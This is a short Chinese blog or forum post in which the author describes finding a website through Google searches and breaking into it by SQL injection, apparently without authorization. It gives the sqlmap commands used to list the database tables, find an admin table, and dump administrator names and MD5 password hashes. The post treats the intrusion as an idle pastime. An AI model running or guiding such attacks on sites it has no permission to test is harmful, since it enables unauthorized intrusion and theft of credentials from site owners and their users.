闲着无聊,在网上逛了逛(Googlehacking翻了翻),找到这个站,手工”和and 1=1测试了下,感觉可以,于是就直接工具检测然后又用sqlmap验证了下。
使用工具:手,kali,sqlmap,safe3wvs。
首先,工具扫描网站漏洞得到可能的注入点(因为之前在T00ls提交过所以才会有水印,非搬运)

然后我们去sqlmap验证下
代码段:sqlmap -u “url”

OK,可以看到爆出的数据库信息以及Payload。
然后,我们开始猜解表名,除了系统信息的一个user,下面的是我们比较关注的表
代码段:sqlmap -u “url”--tables

好了,在这个表里,我们发现有个东西很扎眼-----TAdmin 没错,接下来去猜解下列名,
代码段:sqlmap -u “url” -T –{xxtables} --columns

接下来字段里AdminnName和password里可能有我们要的管理员信息 sqlmap跑下
代码段:sqlmap -u “url” -T –{xxtables} –C 列名,列名–dump

好了,管理员账户和密码都出来了,只不过密码是MD5加密的啦,点到为止,就不再深入啦!
网友评论